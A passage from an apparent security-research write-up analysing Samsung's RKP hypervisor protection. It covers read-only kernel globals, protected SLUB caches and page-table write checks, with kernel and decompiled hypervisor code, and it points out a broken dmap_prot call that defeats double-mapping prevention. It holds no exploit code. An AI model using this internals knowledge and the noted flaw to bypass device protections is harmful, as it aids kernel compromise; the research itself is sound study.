All the global variables that need to be protected by RKP are annotated with either __rkp_ro or __kdp_ro in the kernel sources. These macros move the global variables to the .rkp_ro and kdp_ro sections respectively.

#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss      __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro                __section(.rkp_ro)
// ...
#endif
#ifdef CONFIG_RKP_KDP
#define __kdp_ro                __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
#endif

These sections are part of the kernel's .rodata section, that is made read-only in the second stage in rkp_set_kernel_rox.

#define RO_DATA_SECTION(align)
// ...
    .rkp_ro          : AT(ADDR(.rkp_ro) - LOAD_OFFSET) {        \
        VMLINUX_SYMBOL(__start_rkp_ro) = .;     \
        *(.rkp_ro)                      \
        VMLINUX_SYMBOL(__stop_rkp_ro) = .;      \
        VMLINUX_SYMBOL(__start_kdp_ro) = .;     \
        *(.kdp_ro)                      \
        VMLINUX_SYMBOL(__stop_kdp_ro) = .;      \
        VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .;     \
        RKP_RO_PGT                      \
        VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .;      \
    }                               \

Below is a list of all the global variables that are protected that way.

  • empty_zero_page: special page used for zero-initialized data and copy-on-write.
unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;
  • bm_pte, bm_pmd, bm_pud: PUDs, PMDs, and PTEs of the fixmap.
static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;
  • sys_sb, odm_sb, vendor_sb, art_sb, rootfs_sb: (Samsung) superblocks of mount namespaces to be protected by RKP.
struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;
struct super_block *rootfs_sb __kdp_ro = NULL;
  • is_recovery: (Samsung) indicates the device is in recovery mode.
int is_recovery __kdp_ro = 0;
rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
  • __check_verifiedboot: (Samsung) indicates that the VB state is orange.
int __check_verifiedboot __kdp_ro = 0;
  • rkp_cred_enable: (Samsung) indicates that RKP protects the tasks' credentials.
int rkp_cred_enable __kdp_ro = 0;
  • init_cred: the credentials of the init task.
struct cred init_cred __kdp_ro = { /* ... */ };
  • init_sec: (Samsung) the security context of the init task.
struct task_security_struct init_sec __kdp_ro;
  • selinux_enforcing: indicates that SELinux is enforcing and not permissive.
int selinux_enforcing __kdp_ro;
  • selinux_enabled: indicates that SELinux is enabled.
int selinux_enabled __kdp_ro = 1;
  • selinux_hooks: array containing all security hooks.
static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };
  • ss_initialized: indicates that the SELinux policy has been loaded.
int ss_initialized __kdp_ro;

SLUB Allocator

RKP not only protects the global variables, but it also protects specific caches of the SLUB allocator by using read-only pages for those. These pages come from the hypervisor page allocator, and not the kernel one. There are 3 caches that are protected that way:

  • cred_jar_ro used for allocating struct cred;
  • tsec_jar used for allocating struct task_security_struct;
  • vfsmnt_cache used for allocating struct vfsmount.
#define CRED_JAR_RO     "cred_jar_ro"
#define TSEC_JAR        "tsec_jar"
#define VFSMNT_JAR      "vfsmnt_cache"

The read-only pages are allocated by the rkp_ro_alloc function, which invokes the RKP_RKP_ROBUFFER_ALLOC command.

static inline void *rkp_ro_alloc(void){
    u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
    if(!addr)
        return 0;
    return (void *)__phys_to_virt(addr);
}

Unsurprisingly, the allocate_slab function of the SLUB allocator calls rkp_ro_alloc if the cache is one of the three mentioned above. It then calls a command to inform RKP of the cache type: RKP_KDP_X50 for cred_jar, RKP_KDP_X4E for tsec_jar, and RKP_KDP_X4F for vfsmnt_jar.

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
    // ...
    if (s->name && 
        (!strcmp(s->name, CRED_JAR_RO) ||  
        !strcmp(s->name, TSEC_JAR)|| 
        !strcmp(s->name, VFSMNT_JAR))) {

        virt_page = rkp_ro_alloc();
        if(!virt_page)
            goto def_alloc;

        page = virt_to_page(virt_page);
        oo = s->min;
    } else {
    // ...
    /*
     * We modify the following so that slab alloc for protected data
     * types are allocated from our own pool.
     */
    if (s->name)  {
        u64 sc,va_page;
        va_page = (u64)__va(page_to_phys(page));

        if(!strcmp(s->name, CRED_JAR_RO)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        } 
        if(!strcmp(s->name, TSEC_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
        if(!strcmp(s->name, VFSMNT_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
    }
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
    // ...
}

The read-only pages are freed by the rkp_ro_free function, which invokes the RKP_RKP_ROBUFFER_FREE command.

static inline void rkp_ro_free(void *free_addr){
    uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}

This function is called from free_ro_pages in the SLUB allocator, which iterates over all the pages to free. In addition to calling rkp_ro_free, it also invokes the command RKP_KDP_X48, which reverts changes made by the RKP_KDP_X50, RKP_KDP_X4E, and RKP_KDP_X4F commands.

static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
    unsigned long flags;
    unsigned long long sc,va_page;

    sc = 0;
    va_page = (unsigned long long)__va(page_to_phys(page));
    if(is_rkp_ro_page(va_page)){
        for(sc = 0; sc < (1 << order); sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
            rkp_ro_free((void *)va_page);
            va_page += PAGE_SIZE;
        }
        return;
    }

    spin_lock_irqsave(&ro_pages_lock,flags);
    for(sc = 0; sc < (1 << order); sc++) {
        uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
        va_page += PAGE_SIZE;
    }
    memcg_uncharge_slab(page, order, s);
    __free_pages(page, order);
    spin_unlock_irqrestore(&ro_pages_lock,flags);
}

And unsurprisingly, the __free_slab function of the SLUB allocator calls free_ro_pages if the cache is one of the three mentioned above.

static void __free_slab(struct kmem_cache *s, struct page *page)
{
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
    // ...
    /* We free the protected pages here. */
    if (s->name && (!strcmp(s->name, CRED_JAR_RO) || 
        !strcmp(s->name, TSEC_JAR) || 
        !strcmp(s->name, VFSMNT_JAR))){
        free_ro_pages(s,page, order);
        return;
    }
    // ...
}

Because the pages of these caches are read-only, the kernel cannot update the freelist pointer of their objects and needs to call into the hypervisor. That is why the set_freepointer function of the SLUB allocator invokes the RKP_KDP_X44 command if the cache is one of the three mentioned above.

static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    // ...
    if (rkp_cred_enable && s->name && 
        (!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
                                    !strcmp(s->name, VFSMNT_JAR))) {
        uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
            (u64)freelist_ptr(s, fp, freeptr_addr), 0);
    }
    // ...
}

One last feature of RKP related to the SLUB allocator is double-mapping prevention. You might have noticed, in the allocate_slab and __free_slab functions, calls to dmap_prot. It invokes the RKP_KDP_X4A command to notify the hypervisor that this address is being mapped.

static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
    if(rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}

The cred_jar_ro and tsec_jar caches are created in cred_init. However, this function also invokes the RKP_KDP_X42 command to inform RKP of the size of the cred and task_security_struct structures so that it can handle them properly.

void __init cred_init(void)
{
    // ...
#ifdef  CONFIG_RKP_KDP
    if(rkp_cred_enable) {
        cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
        if(!cred_jar_ro) {
            panic("Unable to create RO Cred cache\n");
        }

        tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
        if(!tsec_jar) {
            panic("Unable to create RO security cache\n");
        }

        // ...
        uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
    }
#endif  /* CONFIG_RKP_KDP */
}

Similarly, the vfsmnt_cache cache is created in mnt_init. This function invokes the RKP_KDP_X41 command to inform RKP of the total size and offsets of various fields of the vfsmount structure.

void __init mnt_init(void)
{
    // ...
    vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
            0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);

    if(!vfsmnt_cache)
        panic("Failed to allocate vfsmnt_cache \n");

    rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
                                        (u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
                                        (u64)offsetof(struct vfsmount,data));
    uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
  // ...
}

For reference, here is the structure ns_param_t given as an argument to the command:

typedef struct ns_param {
    u32 ns_buff_size;
    u32 ns_size;
    u32 bp_offset;
    u32 sb_offset;
    u32 flag_offset;
    u32 data_offset;
}ns_param_t;

And the rkp_ns_fill_params macro used to fill this structure is as follows:

#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data)  \
do {                        \
    nsparam.ns_buff_size = (u64)buff_size;      \
    nsparam.ns_size  = (u64)size;       \
    nsparam.bp_offset = (u64)bp;        \
    nsparam.sb_offset = (u64)sb;        \
    nsparam.flag_offset = (u64)flag;        \
    nsparam.data_offset = (u64)data;        \
} while(0)

The mnt_init function initializing the vfsmnt_cache cache is called from vfs_caches_init.

void __init vfs_caches_init(void)
{
    // ...
    mnt_init();
    // ...
}

And the cred_init function, initializing the cred_jar_ro and tsec_jar cache, and the vfs_caches_init function, are called from start_kernel.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
    vfs_caches_init();
    // ...
}

We have summarized which RKP commands are used by the SLUB allocator and for what purpose in the following table:

Command Function Description
RKP_RKP_ROBUFFER_ALLOC rkp_cmd_rkp_robuffer_alloc Allocate a read-only page
RKP_RKP_ROBUFFER_FREE rkp_cmd_rkp_robuffer_free Free a read-only page
RKP_KDP_X50 rkp_cmd_set_pages_ro_cred_jar Mark a slab of cred_jar
RKP_KDP_X4E rkp_cmd_set_pages_ro_tsec_jar Mark a slab of tsec_jar
RKP_KDP_X4F rkp_cmd_set_pages_ro_vfsmnt_jar Mark a slab of vfsmnt_jar
RKP_KDP_X48 rkp_cmd_ro_free_pages Unmark a slab
RKP_KDP_X44 rkp_cmd_cred_set_fp Set the freelist pointer inside an object
RKP_KDP_X4A rkp_cmd_prot_dble_map Prevent double mapping
RKP_KDP_X42 rkp_cmd_assign_cred_size Inform of the cred objects size
RKP_KDP_X41 rkp_cmd_assign_ns_size Inform of the ns objects size

We can now take a look at the hypervisor side of these commands, starting with the functions to allocate and free read-only pages.

rkp_cmd_rkp_robuffer_alloc simply allocates a page from the hypervisor page allocator (which uses the "robuf" region that we have seen earlier). The ha1/ha2 stuff is only used by the RKP test module and can be safely ignored.

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...

  // Request a page from the hypervisor page allocator.
  page = page_allocator_alloc_page();
  ret_p = regs->x2;
  // The following code is only used for testing purposes.
  if ((ret_p & 1) != 0) {
    if (ha1 != 0 || ha2 != 0) {
      rkp_policy_violation("Setting ha1 or ha2 should be done once");
    }
    ret_p &= 0xfffffffffffffffe;
    ha1 = page;
    ha2 = page + 8;
  }
  // If x2 contains a kernel pointer, store the page address into it.
  if (ret_p) {
    if (!page) {
      uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
    }
    *virt_to_phys_el1(ret_p) = page;
  }
  // Also store the page address into the x0 register.
  regs->x0 = page;
  return 0;
}

Similarly, rkp_cmd_rkp_robuffer_alloc simply gives the page back to the hypervisor page allocator.

int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
  // ...

  // Sanity-checking on the page address in x2.
  if (!regs->x2) {
    uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
  }
  // Convert the VA given by the kernel into a PA.
  page = rkp_get_pa(regs->x2);
  // Free the page in the hypervisor page allocator.
  page_allocator_free_page(page);
  return 0;
}

The rkp_cmd_set_pages_ro_cred_jar, rkp_cmd_set_pages_ro_tsec_jar, and rkp_cmd_set_pages_ro_tsec_jar functions are called by the kernel to inform the hypervisor of the cache type that a read-only page has been allocated for. These functions all end up calling rkp_set_pages_ro, but with different arguments.

The rkp_set_pages_ro function converts the kernel VA into a PA, then marks the page read-only in the second stage. It then zeroes out the page and marks it with the appropriate type (CRED, SEC_PTR, or NS) in the physmap.

uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
  // ...

  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Make the target page read-only in the second stage.
  if (rkp_s2_page_change_permission(page, 0x80 /* read-only */, 0 /* non-executable */, 0) == -1) {
    uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
  } else {
    // Reset the page to avoid leaking previous content.
    memset(page, 0xff, 0x1000);
    // Compute the corresponding type based on the argument.
    switch (type) {
      case 0:
        type = CRED;
        break;
      case 1:
        type = SEC_PTR;
        break;
      case 2:
        type = NS;
        break;
    }
    // Mark the page in the physmap.
    rkp_phys_map_set(page, type);
    return rkp_phys_map_unlock(page);
  }
  return rkp_phys_map_unlock(page);
}

The rkp_cmd_ro_free_pages function is called to revert the above changes when the page is being freed. It calls rkp_ro_free_pages, which also converts the kernel VA into a PA and verifies that it is marked with the expected type in the physmap. If everything is good, it makes the page writable in the second stage, zeroes it out again, and marks it as FREE in the physmap.

uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
  // ...

  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Check if the page is marked with the appropriate type in the physmap.
  if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
    uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Make the target page writable in the second stage.
  if (rkp_s2_page_change_permission(page, 0 /* writable */, 1 /* executable */, 0) < 0) {
    uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Reset the page to avoid leaking current content.
  memset(page, 0, 0x1000);
  // Mark the page as `FREE` in the physmap.
  rkp_phys_map_set(page, FREE);
  return rkp_phys_map_unlock(page);
}

The rkp_cred_set_fp function is called by the SLUB allocator to change the freelist pointer (pointer to the next free object) of a read-only object. It ensures that the object is marked with the appropriate type in the physmap and that the next freelist pointer is marked with the same type. It does some sanity-checking on the object address and pointer offset before finally updating the freelist pointer within the object.

void rkp_cred_set_fp(saved_regs_t* regs) {
  // ...

  // Convert the object virtual address into a physical address.
  object_pa = rkp_get_pa(regs->x2);
  // `offset` is the offset of the freelist pointer in the object.
  offset = regs->x3;
  // `freelist_ptr` is the value to be written at `offset` in the object.
  freelist_ptr = regs->x4;
  rkp_phys_map_lock(object_pa);
  // Ensure the object is located in one of the 3 caches.
  if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
    uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_cred = is_phys_map_cred(object_pa);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    // If not, trigger a policy violation.
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
    rkp_phys_map_unlock(object_pa);
  }
  rkp_phys_map_unlock(object_pa);
  // If the freelist pointer (next free object) is not NULL.
  if (freelist_ptr) {
    // Convert the next free object VA into a PA.
    freelist_ptr_pa = rkp_get_pa(freelist_ptr);
    rkp_phys_map_lock(freelist_ptr_pa);
    // Ensure the next free object is also located in one of the 3 caches.
    if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
        !is_phys_map_ns(freelist_ptr_pa)) {
      uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
      is_cred = is_phys_map_cred(freelist_ptr_pa);
      is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
      // If not, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
      rkp_phys_map_unlock(vafreelist_ptr_par14);
    }
    rkp_phys_map_unlock(freelist_ptr_pa);
  }
  // Sanity-checking on the object address within the page and freelist pointer offset.
  if (invalid_cred_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
           regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  }
  // Update the freelist pointer within the object if the checks passed.
  else {
    *(offset + object_pa) = freelist_ptr;
  }
}

The invalid_cred_fp, invalid_sec_ptr_fp, and invalid_ns_fp functions all do the same checks. They ensure the object PA is marked with the appropriate type in the physmap, that the VA is aligned on the object size, and finally that the freelist pointer offset is equal to the object size (which is the case for caches with a constructor).

int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `CRED` in the physmap.
  if (!is_phys_map_cred(object_pa) ||
      // Ensure the object VA is aligned on the size of the cred structure.
      object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the cred structure.
          rkp_cred->CRED_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}
int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `SEC_PTR` in the physmap.
  if (!is_phys_map_sec_ptr(object_pa) ||
      // Ensure the object VA is aligned on the size of the task_security_struct structure.
      object_va && object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the task_security_struct structure.
          rkp_cred->SP_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}
int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `NS` in the physmap.
  if (!is_phys_map_ns(object_pa) ||
      // Ensure the object VA is aligned on the size of the vfsmount structure.
      object_va && object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the vfsmount structure.
          rkp_cred->NS_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

The rkp_cmd_prot_dble_map function is called to inform the hypervisor that one or multiple pages are being mapped or unmapped, with the end goal being to prevent double mapping. This function calls rkp_prot_dble_map, which sets or unsets the bits of dbl_bitmap for each page of the region.

saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
  // ...

  // Sanity-check: the base address must be page-aligned.
  address = regs->x2 & 0xfffffffff000;
  if (!address) {
    return 0;
  }
  // The value to put in the bitmap (0 = unmapped, 1 = mapped).
  val = regs->x4;
  if (val > 1) {
    uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
    return 0;
  }
  // The order, from which the size of the region can be calculated.
  order = regs->x3;
  if (order <= 19) {
    offset = 0;
    size = 0x1000 << order;
    // Iterate over all the pages in the target region.
    do {
      // Set the `dbl_bitmap` value for the current page.
      res = rkp_set_map_bitmap(address + offset, val);
      if (!res) {
        uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
      }
      offset += 0x1000;
    } while (offset < size);
  }
}

The attentive reader will have noticed that the kernel function dmap_prot doesn't call the hypervisor function rkp_prot_dble_map properly: it doesn't give it its addr argument, so the arguments are all messed up and nothing works as expected.

The last two functions, rkp_cmd_assign_cred_size and rkp_cmd_assign_ns_size, are used by the kernel mainly to tell the hypervisor the size of the structures allocated in the read-only caches.

rkp_cmd_assign_cred_size calls rkp_assign_cred_size, which saves the sizes of the cred and task_security_struct structures into global variables.

int64_t rkp_assign_cred_size(saved_regs_t* regs) {
  // ...

  // Save the size of the cred structure in `CRED_BUFF_SIZE`.
  cred_jar_size = regs->x2;
  rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
  // Save the size of the task_security_struct structure in `SP_BUFF_SIZE`.
  tsec_jar_size = regs->x3;
  rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
  return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}

rkp_cmd_assign_ns_size calls rkp_assign_ns_size, which saves the size of the vfsmount structure, and the offsets of various fields of this structure, into the global variable rkp_cred that we will detail later.

int64_t rkp_assign_ns_size(saved_regs_t* regs) {
  // ...

  // The global variable must have been allocated.
  if (!rkp_cred) {
    return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
  }
  // The argument structure VA is converted into a PA.
  nsparam_user = rkp_get_pa(regs->x2);
  if (!nsparam_user) {
    return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
  }
  // It is copied into a local variable before extracting the various fields.
  memcpy(&nsparam, nsparam_user, sizeof(nsparam));
  // Save the size of the vfsmount structure.
  ns_buff_size = nsparam.ns_buff_size;
  ns_size = nsparam.ns_size;
  rkp_cred->NS_BUFF_SIZE = ns_buff_size;
  rkp_cred->NS_SIZE = ns_size;
  // Ensure the offsets of the fields are smaller than the vfsmount structure size.
  if (nsparam.bp_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  sb_offset = nsparam.sb_offset;
  if (nsparam.sb_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  flag_offset = nsparam.flag_offset;
  if (nsparam.flag_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  data_offset = nsparam.data_offset;
  if (nsparam.data_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  // Save the offsets of the various fields of the vfsmount structure.
  rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
  rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
  rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
  rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
  uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated  Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
  return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
                rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}

Modifying Page Tables

In the Page Tables Processing section, we have seen that most of the kernel page tables are made read-only in the second stage. But what happens if the kernel needs to modify its page tables entries? This is what we are going to see in this section.

On the kernel side, the entries are modified for each level in the set_pud, set_pmd, and set_pte functions.

For PUDs and PMDs, set_pud and set_pmd first check if the page is protected by the hypervisor by calling the rkp_is_pg_protected function (that uses the ro_bitmap). If the page is indeed protected, then they call the RKP_WRITE_PGT1 and RKP_WRITE_PGT2 commands, respectively, instead of performing the write directly.

static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pudp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pudp), "r" (pud)
        : "x1", "x2", "memory");
    }
#else
    *pudp = pud;
#endif
    dsb(ishst);
    isb();
}
static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pmdp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pmdp), "r" (pmd)
        : "x1", "x2", "memory");
    }
#else
    *pmdp = pmd;
#endif
    dsb(ishst);
    isb();
}

For PTs, set_pte also checks if the page is protected, but in addition, it calls rkp_is_pg_dbl_mapped to check if the physical page is already mapped somewhere else in virtual memory (using the dbl_bitmap). This way, the kernel can detect double mappings.

static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
    /* bug on double mapping */
    BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));

    if (rkp_is_pg_protected((u64)ptep)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (ptep), "r" (pte)
        : "x1", "x2", "memory");
    }
#else
    *ptep = pte;
#endif
    /*
     * Only if the new pte is valid and kernel, otherwise TLB maintenance
     * or update_mmu_cache() have the necessary barriers.
     */
    if (pte_valid_not_user(pte)) {
        dsb(ishst);
        isb();
    }
}

On the hypervisor side, the rkp_cmd_write_pgtx function simply calls rkp_lxpgt_write after incrementing a counter.

We will now detail the checks that are performed by the hypervisor when modifying an entry of each page table level.

First Level

rkp_l1pgt_write handles writes to first level tables (or PUDs). It first ensures the PUD is marked as L1 in the physmap, unless RKP is not deferred initialized. It then processes the old descriptor value: blocks are not allowed to be unmapped, tables are processed by the rkp_l2pgt_process_table function. It then processes the new descriptor value as well: blocks are not allowed to be mapped, and tables are processed by the rkp_l2pgt_process_table function, and their PXN bit is set for user PUDs. Finally, the descriptor value is updated.

uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
  // ...

  // Convert the PUD descriptor PA into a VA.
  pudp_pa = rkp_get_pa(pudp);
  // Get the old/current value of the PUD descriptor.
  pud_old = *pudp_pa;
  rkp_phys_map_lock(pudp_pa);
  // Ensure the PUD is marked as such in the physmap.
  if (!is_phys_map_l1(pudp_pa)) {
    // If it is not, but RKP is not deferred initialized, perform the write.
    if (!rkp_deferred_inited) {
      set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
